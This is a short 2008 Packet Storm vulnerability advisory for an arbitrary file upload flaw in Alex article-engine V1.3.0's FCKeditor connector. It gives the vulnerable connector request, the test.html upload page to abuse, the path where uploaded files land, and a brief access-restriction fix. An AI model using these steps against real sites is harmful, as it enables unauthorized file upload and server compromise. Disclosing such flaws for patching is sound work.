alexarticle-upload.txt

2008-11-19T00:00:00
ID PACKETSTORM:72089
Type packetstorm
Reporter Batter
Modified 2008-11-19T00:00:00

Description

                                        
                                            `########################################################################  
#  
# Yellow Flood Organization  
#  
# Alex article-engine V1.3.0 (fckeditor) Arbitrary File Upload  
#  
# Source: http://www.alexscriptengine.de/blog/category/article-engine/  
#  
# Download: http://www.alexscriptengine.de/blog/asedownloads/article-engine/  
#  
# Discover by: Batter  
#  
########################################################################  
  
  
  
####################  
- Vulnerability:  
####################  
  
/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?  
  
Command=FileUpload&Type=File&CurrentFolder=/  
  
####################  
- Exploit:  
####################  
  
http://www.site.com/path/admin/includes/FCKeditor/editor/filemanager/browser/default/connectors/test.html  
  
####################  
- how To use:  
####################  
  
http://www.site.com/script-folder-name/script-folder-name/images/site_images/uploadet-file.*  
  
####################  
- Solution:  
####################  
  
Restrict and grant only trusted users access to the resources.  
  
####################  
- Greets :  
####################  
  
THE.HACKER.ONE , Str0ke  
  
####################  
  
`